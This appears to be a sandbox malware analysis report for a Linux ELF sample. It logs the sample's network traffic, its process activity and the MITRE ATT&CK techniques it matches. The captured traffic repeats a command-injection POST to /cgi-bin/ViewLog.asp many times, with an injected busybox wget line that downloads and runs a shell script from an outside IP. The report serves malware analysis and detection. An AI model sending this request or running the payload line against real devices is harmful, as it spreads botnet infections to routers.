Feb 14, 2024 09:32:07.317622900 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1068	192.168.2.15	33766	62.29.49.147	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:22.152719975 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1069	192.168.2.15	35800	94.123.91.28	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:22.153083086 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1070	192.168.2.15	40252	94.214.44.205	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:22.386595964 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1071	192.168.2.15	53100	85.74.232.183	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:22.392992020 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:22.635240078 CET	388	IN	HTTP/1.1 404 Not Found Date: Sun, 04 Jan 1970 10:35:04 GMT Server: DNVRS-Webs Cache-Control: no-cache Content-Length: 166 Content-Type: text/html Connection: keep-alive Keep-Alive: timeout=60, max=99 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1072	192.168.2.15	39264	31.136.181.202	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:22.559844017 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:23.254829884 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:24.598771095 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:27.382694960 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:32.758588076 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:43.510284901 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:32:05.269860983 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1073	192.168.2.15	55386	85.247.19.214	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:22.633558989 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:22.894697905 CET	433	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:31:21 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1074	192.168.2.15	46286	94.122.5.164	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:22.634296894 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1075	192.168.2.15	48262	62.219.113.63	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:22.655668020 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

System Behavior

Analysis Process: E6l0C6FObI.elf PID: 5827, Parent PID: 5752

General

Start time (UTC):	08:28:43
Start date (UTC):	14/02/2024
Path:	/tmp/E6l0C6FObI.elf
Arguments:	/tmp/E6l0C6FObI.elf
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	08:28:43
Start date (UTC):	14/02/2024
Path:	/tmp/E6l0C6FObI.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	08:28:43
Start date (UTC):	14/02/2024
Path:	/tmp/E6l0C6FObI.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	08:28:43
Start date (UTC):	14/02/2024
Path:	/tmp/E6l0C6FObI.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	08:28:43
Start date (UTC):	14/02/2024
Path:	/tmp/E6l0C6FObI.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Analysis Process: E6l0C6FObI.elf PID: 5837, Parent PID: 5833

General

Start time (UTC):	08:28:43
Start date (UTC):	14/02/2024
Path:	/tmp/E6l0C6FObI.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Analysis Process: E6l0C6FObI.elf PID: 5841, Parent PID: 5833

General

Start time (UTC):	08:28:43
Start date (UTC):	14/02/2024
Path:	/tmp/E6l0C6FObI.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Analysis Process: E6l0C6FObI.elf PID: 5843, Parent PID: 5833

General

Start time (UTC):	08:28:43
Start date (UTC):	14/02/2024
Path:	/tmp/E6l0C6FObI.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	08:28:43
Start date (UTC):	14/02/2024
Path:	/tmp/E6l0C6FObI.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	08:28:43
Start date (UTC):	14/02/2024
Path:	/tmp/E6l0C6FObI.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.
Tactics:	Impact
Data Sources:	Command: Command Execution, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Termination, Service: Service Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report E6l0C6FObI.elf

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

PCAP (Network Traffic)

Snort Signatures

Joe Sandbox Signatures

AV Detection

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

DNS Queries

DNS Answers

HTTP Packets

System Behavior

Analysis Process: E6l0C6FObI.elf PID: 5827, Parent PID: 5752

General

File Activities

File Opened

File Read

Process Activities

Process Forked

Prctl Requested

System Activities

Query System Information (uname)

Network Activities

Socket starts Listening

Linux Analysis Report
E6l0C6FObI.elf